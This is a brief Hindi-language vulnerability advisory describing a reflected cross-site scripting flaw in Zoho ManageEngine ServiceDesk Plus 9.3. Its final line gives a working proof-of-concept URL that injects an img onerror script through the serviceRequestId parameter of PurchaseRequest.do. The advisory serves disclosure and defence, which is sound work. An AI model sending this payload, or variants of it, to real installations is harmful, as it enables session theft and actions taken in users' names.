
Zoho ManageEngine ServiceDesk Plus 9.3 के लिए प्रूफ-ऑफ-कॉन्सेप्ट XSS एक्सप्लॉइट PurchaseRequest.do serviceRequestId पैरामीटर के माध्यम से, प्रतिबिंबित क्रॉस-साइट स्क्रिप्टिंग भेद्यता प्रदर्शित करता है।
सूचना विवरण: Zoho ManageEngine ServiceDesk Plus 9.3 में एक समस्या पाई गई। PurchaseRequest.do के serviceRequestId पैरामीटर के माध्यम से XSS संभव है।
लेखक: Concobe of Tarantula Team - VinCSS (Vingroup का सदस्य)
domain/PurchaseRequest.do?operation=getAssociatedPrsForSR&serviceRequestId=1%3Cimg%20src%3da%20onerror%3dalert(%27XSS%27)%3E1